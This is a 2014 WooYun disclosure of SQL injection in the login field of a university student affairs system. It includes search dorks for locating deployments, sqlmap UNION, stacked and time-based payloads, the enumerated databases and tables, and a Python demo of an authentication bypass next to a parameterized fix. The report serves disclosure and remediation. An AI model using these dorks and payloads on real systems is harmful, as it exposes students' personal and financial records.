Generic SQL injection vulnerability in a university management system

Vulnerability summary

Defect ID: WooYun-2014-054213

Title: Generic SQL injection vulnerability in a university management system

Vendor: 西安奥达软件工程有限公司 (Xi'an Aoda Software Engineering Co., Ltd.)

Author: Mr.leo

Submitted: 2014-03-29 11:30

Published: 2014-06-25 11:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Tags:

Vulnerability details

Disclosure status:

2014-03-29: Details sent to the vendor, awaiting vendor handling
2014-04-01: Vendor confirmed; details visible to the vendor only
2014-04-04: Details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol, Wusheng Information)
2014-05-26: Details opened to core white hats and domain experts
2014-06-05: Details opened to regular white hats
2014-06-15: Details opened to intern white hats
2014-06-25: Details opened to the public

Brief description:

A university management system has a generic SQL injection vulnerability: the same unfiltered login parameter is injectable on every deployment of the product.

Detailed description:

Both the front end and the back end of the student affairs management system (高校学生工作管理系统) from 西安奥达软件工程有限公司 are injectable.

1. Front end of the student affairs management system

Search keyword: intitle:学生工作管理系统 Login/List.aspx?ID=

Affected instances found with it:

**.**.**.**/login/List.aspx?ID=10
http://**.**.**.**/Login/List.aspx?ID=99
http://**.**.**.**/Login/List.aspx?ID=99
**.**.**.**/login/List.aspx?ID=99
**.**.**.**/Login/List.aspx?ID=99

Taking http://**.**.**.**/Login/List.aspx?ID=99 as the example:

sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Place: POST
Parameter: txtUserId
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录
---

current user: 'auda'
current database: 'StudWorkXiDian'
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb

Cross-database access is possible: the application's database login can read databases other than its own. The sample database pubs, for instance:

Database: pubs
[14 tables]
+----------------------+
| dbo.authors          |
| dbo.discounts        |
| dbo.employee         |
| dbo.jobs             |
| dbo.pub_info         |
| dbo.publishers       |
| dbo.roysched         |
| dbo.sales            |
| dbo.stores           |
| dbo.sysconstraints   |
| dbo.syssegments      |
| dbo.titleauthor      |
| dbo.titles           |
| dbo.titleview        |
+----------------------+

2. Back end of the student affairs management system

Search keyword: inurl:/Login/loginpageforuserb.aspx

Affected instances found with it:

**.**.**.**/Login/loginpageforuserb.aspx
http://**.**.**.**/Login/loginpageforuserb.aspx
http://**.**.**.**/Login/loginpageforuserb.aspx
**.**.**.**/Login/loginpageforuserb.aspx
**.**.**.**/Login/loginpageforuserb.aspx
http://**.**.**.**/Login/loginpageforuserb.aspx
**.**.**.**/Login/loginpageforuserb.aspx
**.**.**.**/Login/loginpageforuserb.aspx
http://**.**.**.**/Login/loginpageforuserb.aspx

Taking **.**.**.**/Login/loginpageforuserb.aspx as the example: the username field (txtUserId) is not filtered, which leads to injection.

Request captured with Burp:

POST **.**.**.**/Login/loginpageforuserb.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/Login/loginpageforuserb.aspx
Cookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoaz
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 719

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95

sqlmap result on this request (the same three techniques as on the front end):

---
Place: POST
Parameter: txtUserId
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录
---
[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[15:36:02] [INFO] fetching current user
current user: 'auda'
[15:36:02] [INFO] fetching current database
current database: 'StudWorkXiDian'
[15:36:02] [INFO] fetching database names
[15:36:02] [INFO] the SQL query used returns 7 entries
[15:36:02] [INFO] resumed: "master"
[15:36:02] [INFO] resumed: "model"
[15:36:02] [INFO] resumed: "msdb"
[15:36:02] [INFO] resumed: "Northwind"
[15:36:02] [INFO] resumed: "pubs"
[15:36:02] [INFO] resumed: "StudWorkXiDian"
[15:36:02] [INFO] resumed: "tempdb"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb

The application database holds 257 tables (student records, loans, subsidies, party membership, dormitory assignments, login logs and sessions):

Database: StudWorkXiDian
[257 tables]
+-------------------------------+
| dbo.LogTemp |
| dbo.Test |
| dbo.Vstipend_ApplyInfo |
| dbo.Vsubsidy_ApplyInfo |
| dbo.[tsys_Modules_测试] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tAcc_File |
| dbo.tAppoinmentRelation |
| dbo.tAppointment |
| dbo.tAppointmentType |
| dbo.tAppointmentTypeExplain |
| dbo.tArr_Accessories |
| dbo.tArr_ArrType |
| dbo.tArr_Auditing |
| dbo.tArr_requiteType |
| dbo.tCadre_InWork |
| dbo.tCadre_OutWork |
| dbo.tCadre_StudWork |
| dbo.tDorm_Area |
| dbo.tDorm_Bed |
| dbo.tDorm_Building |
| dbo.tDorm_ChargeHistory |
| dbo.tDorm_History |
| dbo.tDorm_RewardHistory |
| dbo.tDorm_Room |
| dbo.tDorm_RoomMaster |
| dbo.tDorm_RoomType |
| dbo.tDrom_BuildingUser |
| dbo.tFile_Video |
| dbo.tGB_GMZ |
| dbo.tGB_HYZK |
| dbo.tGB_JKZK |
| dbo.tGB_SJGGHDQ |
| dbo.tGB_XB |
| dbo.tGB_XW |
| dbo.tGB_XZQH |
| dbo.tGB_ZZMM |
| dbo.tJQRY_Apply |
| dbo.tJQRY_SP |
| dbo.tJQRY_Type |
| dbo.tOther_ArcAgent |
| dbo.tOther_ArcBase |
| dbo.tOther_ArcContent |
| dbo.tOther_ArcItem |
| dbo.tOther_ArcTurnOver |
| dbo.tPoor_Student |
| dbo.tPopedom_Atom |
| dbo.tReg_register |
| dbo.tReplyAppointment |
| dbo.tSchoolLoanLevel |
| dbo.tSchoolLoanProportion |
| dbo.tSchoolLoanRefund |
| dbo.tSchoolLoans |
| dbo.tStudCadre_Info |
| dbo.tStudCadre_Type |
| dbo.tStudCadre_Unit |
| dbo.tStud_AllowApply |
| dbo.tTemp_Apply |
| dbo.tarm_AwardList |
| dbo.tarm_CentType |
| dbo.tarm_StudCourse |
| dbo.tarm_StudLevy |
| dbo.tarm_StudRecord |
| dbo.tarm_policy |
| dbo.tarr_Info |
| dbo.tarr_repay |
| dbo.tasl_Affirm |
| dbo.tasl_Bank |
| dbo.tasl_BankAuditing |
| dbo.tasl_BankBargain |
| dbo.tasl_Breach |
| dbo.tasl_End |
| dbo.tasl_Extend |
| dbo.tasl_Familial |
| dbo.tasl_Imburse |
| dbo.tasl_LoanType |
| dbo.tasl_Postponed |
| dbo.tasl_SchoolAuditing |
| dbo.tasl_SchoolAuditingIdea |
| dbo.tasl_StudRequisition |
| dbo.tasl_Whither |
| dbo.tbase_Department |
| dbo.tbase_Teacher |
| dbo.tbase_User |
| dbo.tcgt_StudCourse2 |
| dbo.tcgt_StudCourse3 |
| dbo.tcgt_StudRecord2 |
| dbo.tcgt_StudRecord3 |
| dbo.tcgt_stdResultCell |
| dbo.tcgt_stdResultCell2 |
| dbo.tcgt_stdResultCell3 |
| dbo.tcgt_stdScale2 |
| dbo.tcgt_stdScale3 |
| dbo.tcmoe_RewardLevel |
| dbo.tcmoe_RewardType |
| dbo.tcmoe_StatusChangeCause |
| dbo.tcmoe_StatusChangeType |
| dbo.tcode_Academic |
| dbo.tcode_BloodType |
| dbo.tcode_CultivateMode |
| dbo.tcode_Educate |
| dbo.tcode_Emigrant |
| dbo.tcode_Job |
| dbo.tcode_LoanState |
| dbo.tcode_Post |
| dbo.tcode_ProSchoolAccount |
| dbo.tcode_PsychologyLevel |
| dbo.tcode_StudType |
| dbo.tcode_TeacherRole |
| dbo.tcode_poorType |
| dbo.tcpt_BranchActivity |
| dbo.tcpt_ClassRelation |
| dbo.tcpt_Document |
| dbo.tcpt_MemberStudy |
| dbo.tcpt_PartyActive |
| dbo.tcpt_PartyBranch |
| dbo.tcpt_PartyMember |
| dbo.tcpt_PartyPrep |
| dbo.tcpt_PersonRelation |
| dbo.tcpt_Requisition |
| dbo.terr_Accessories |
| dbo.terr_Auditing |
| dbo.terr_Auditing2 |
| dbo.terr_ErrCause |
| dbo.terr_ErrInfo |
| dbo.terr_ErrType |
| dbo.terr_PunishType |
| dbo.terr_Remove |
| dbo.titem_PartyBranchType |
| dbo.titem_PartyMemberType |
| dbo.titem_PartySchoolType |
| dbo.tmem_BookEnrol |
| dbo.tmem_ChooseCadre |
| dbo.tmem_Development |
| dbo.tmem_DevelopmentNum |
| dbo.tmem_MemBerDocment |
| dbo.tmem_MemCharge |
| dbo.tmem_Member |
| dbo.tmem_OrgType |
| dbo.tmem_Party |
| dbo.tmem_PartyNum |
| dbo.tmem_Record |
| dbo.tmem_Rewards |
| dbo.tmem_TrainDepartment |
| dbo.tmem_TrainManInfo |
| dbo.tmem_orgMan |
| dbo.tmem_organization |
| dbo.tmema_ActivityApply |
| dbo.tmema_ActivityAudit |
| dbo.tmema_ActivityField |
| dbo.tmema_AssnJob |
| dbo.tmema_AssnMember |
| dbo.tmemp_Activity |
| dbo.tmemp_ComAuthor |
| dbo.tmemp_ComManuscript |
| dbo.tmemp_ComReport |
| dbo.tmemp_PublicationIssue |
| dbo.tmemp_PulicJob |
| dbo.tpopedom_UserBackManage |
| dbo.tpopedom_UserModule |
| dbo.treward_Information |
| dbo.treward_InformationG |
| dbo.treward_TypeG |
| dbo.tsafety_InsurePayforMoney |
| dbo.tsafety_InsureRegStudent |
| dbo.tsafety_SafetyGrade |
| dbo.tsafety_Type |
| dbo.tschol_Annotion |
| dbo.tschol_Apply |
| dbo.tschol_Classify |
| dbo.tschol_Quotas |
| dbo.tschol_RankObj |
| dbo.tssc_History |
| dbo.tstipend_Annotion |
| dbo.tstipend_Apply |
| dbo.tstipend_Apply_Temp |
| dbo.tstipend_Classify |
| dbo.tstipend_Quotas |
| dbo.tstipend_RankObj |
| dbo.tstud_Accessories |
| dbo.tstud_CardPrint |
| dbo.tstud_CardPrintFiled |
| dbo.tstud_Family |
| dbo.tstud_FieldEdit |
| dbo.tstud_Student_BKS |
| dbo.tstud_Student_Temp_BKS |
| dbo.tstud_Student_Temp_YJS |
| dbo.tstud_Student_YJS |
| dbo.tsubsidy_Annotion |
| dbo.tsubsidy_Apply |
| dbo.tsubsidy_Apply_Temp |
| dbo.tsubsidy_Classify |
| dbo.tsubsidy_Quotas |
| dbo.tsubsidy_RankObj |
| dbo.tsys_Download |
| dbo.tsys_FriendlyLink |
| dbo.tsys_Notice |
| dbo.tsys_NoticeType |
| dbo.tsys_Options |
| dbo.tsys_VoteList |
| dbo.tsys_VoteProject |
| dbo.tsys_VoteRen |
| dbo.tsys_loginLog |
| dbo.tsys_loginSession |
| **.**.**.**ork_Apply |
| **.**.**.**ork_Apply_Temp |
| **.**.**.**ork_CheckIn |
| **.**.**.**ork_Department |
| **.**.**.**ork_PayMoney |
| **.**.**.**ork_PostObj |
| **.**.**.**ork_PostType |
| dbo.txm_PYFS |
| dbo.txm_SS |
| dbo.txm_XL |
| dbo.txm_XSLX |
| dbo.txm_XSZT |
| dbo.vAloan_ListAff |
| dbo.vAloan_ListBasic |
| dbo.vAloan_ListExtend |
| dbo.vArr_ApplyInfo_BKS |
| dbo.vArr_ApplyInfo_YJS |
| dbo.vCadreGroup_state |
| dbo.vDorm_AllRoomDetail |
| dbo.vDorm_Bed |
| dbo.vDorm_BuidingCode |
| dbo.vDorm_CanBePreared |
| dbo.vDorm_CanUseBed |
| dbo.vDorm_Preared |
| dbo.vDorm_UsedBed |
| dbo.vDorm_building |
| dbo.vDorm_room |
| dbo.vDorm_student |
| dbo.vSchol_QuotaForDept |
| dbo.vSchoolLoans_BKS |
| dbo.vbase_Department |
| dbo.vcgt_StudSumRecord2 |
| dbo.vcgt_StudSumRecord3 |
| dbo.vcgt_student |
| dbo.vparty_PersonRelation |
| dbo.vparty_StatBranchSum |
| dbo.vpopedom_UserModule |
| dbo.vschol_QuotaForClass |
| dbo.vstipend_Classify |
| dbo.vstipend_QuotaForClass |
| dbo.vstipend_QuotaForDept |
| dbo.vstipend_QuotaForGrade |
| dbo.vstud_Student_BKS |
| dbo.vstud_Student_Temp_BKS |
| dbo.vstud_Student_YJS |
| dbo.vsubsidy_Classify |
| dbo.vsubsidy_QuotaForClass |
| dbo.vsubsidy_QuotaForDept |
| dbo.vsubsidy_QuotaForGrade |
| dbo.vtstud_Student_Temp_YJS |
| dbo.vwork_Department |
+-------------------------------+

Proof of vulnerability:

Demonstrated above: sqlmap confirmed UNION, stacked-query and time-based injection through txtUserId, and the enumeration of the current user, the current database, all seven databases and the 257 tables of StudWorkXiDian shows the data that is exposed.

Remediation:

Validate and filter all of the affected parameters (txtUserId at minimum, and every other form field that reaches a query). Filtering alone is fragile; the proper fix in ASP.NET is to pass the form values as SqlParameter values to a parameterized SqlCommand instead of concatenating them into the query text. Since the database login 'auda' can read master, pubs, Northwind and the other databases, the application should also connect with a least-privileged login restricted to StudWorkXiDian, which limits what any remaining injection can reach.
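As an added example (not code from the report, the vendor or the product), the following Python script models the login query the report attacks against an in-memory SQLite database. It shows the concatenated query shape that the unfiltered txtUserId implies, the report's UNION payload with its CHAR() chain decoded to sqlmap's marker string, a plain authentication bypass through the same field, and the parameterized form recommended above. tbase_User is a table name from the report's listing, but its six-column layout is an assumption chosen to match sqlmap's "6 columns" finding; SQLite has no T-SQL CHAR()+CHAR() concatenation, so the decoded marker is passed as a string literal.

```python
import re
import sqlite3

# Constructed stand-in for the application's user table. tbase_User is a real
# table name from the report's listing; these six columns are an assumption
# chosen to match sqlmap's "Generic UNION query (NULL) - 6 columns" finding.
SCHEMA = """
CREATE TABLE tbase_User (
    UserId  TEXT PRIMARY KEY,
    Pwd     TEXT NOT NULL,
    Name    TEXT,
    DeptId  TEXT,
    Role    TEXT,
    Enabled INTEGER
);
INSERT INTO tbase_User VALUES ('20140001', 'secret',  'Li Lei', 'D01', 'student', 1);
INSERT INTO tbase_User VALUES ('admin',    'hunter2', 'Admin',  'D00', 'admin',   1);
"""

# The CHAR() chain exactly as it appears in the report's UNION payload.
PAGE_CHAR_CHAIN = (
    "CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+"
    "CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+"
    "CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58)"
)


def make_db():
    """Fresh in-memory database with the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, txt_user_id, txt_pwd):
    """Assumed shape of the broken login: form fields concatenated into SQL.
    The report only shows that txtUserId is unfiltered; this is the minimal
    code that produces exactly the behaviour sqlmap detected."""
    sql = ("SELECT * FROM tbase_User WHERE UserId='" + txt_user_id
           + "' AND Pwd='" + txt_pwd + "'")
    return conn.execute(sql).fetchall()


def login_fixed(conn, txt_user_id, txt_pwd):
    """Parameterized query: the input is bound as data and never parsed as SQL
    (the SQLite equivalent of SqlCommand + SqlParameter in ADO.NET)."""
    sql = "SELECT * FROM tbase_User WHERE UserId=? AND Pwd=?"
    return conn.execute(sql, (txt_user_id, txt_pwd)).fetchall()


def decode_char_chain(expr):
    """Evaluate a T-SQL CHAR(n)+CHAR(n)+... expression to the string it builds.
    sqlmap encodes its marker this way so the payload needs no quote characters."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def union_payload(marker):
    """The report's UNION payload for txtUserId: six columns, marker in column 5,
    '-- ' to comment out the rest of the original WHERE clause. SQLite has no
    CHAR()+CHAR() string concatenation, so the marker is passed as a literal."""
    return "1' UNION ALL SELECT NULL, NULL, NULL, NULL, '" + marker + "', NULL-- "


def demo():
    """Run the cases against a fresh database and return their results."""
    conn = make_db()
    marker = decode_char_chain(PAGE_CHAR_CHAIN)
    return {
        "marker": marker,
        # sqlmap's UNION check: the marker comes back inside a result column,
        # which confirms the column count (6) and which column is reflected.
        "vulnerable_union": login_vulnerable(conn, union_payload(marker), "1"),
        # The same injection point used for a plain authentication bypass.
        "vulnerable_bypass": login_vulnerable(conn, "admin'-- ", "wrong"),
        # The parameterized query treats both payloads as literal user IDs.
        "fixed_union": login_fixed(conn, union_payload(marker), "1"),
        "fixed_bypass": login_fixed(conn, "admin'-- ", "wrong"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The decoded marker is what sqlmap searches for in the HTML response: if it appears, the injected SELECT was unioned into the original result set and the reflecting column can carry any value the attacker chooses (a table name, a password hash). The stacked and time-based payloads in the report go through the same unfiltered field and are not modelled here because SQLite executes only one statement per call and has no WAITFOR DELAY.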

Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2014-04-01 09:12

Vendor reply:

CNVD confirmed and reproduced the multiple instances described; the verification and handling work was forwarded by CNCERT to the Shanghai Jiao Tong University Network and Information Center for completion.

Latest status:

None yet

Comments

  1. 2010-01-01 00:00 zzR (White hat | Rank: 1179 | Vulnerabilities: 101)

    Wiping out the zero-reply posts

  2. 2010-01-01 00:00 Mr.leo (White hat | Rank: 932 | Vulnerabilities: 80)

    @zzR Your mission is a sacred one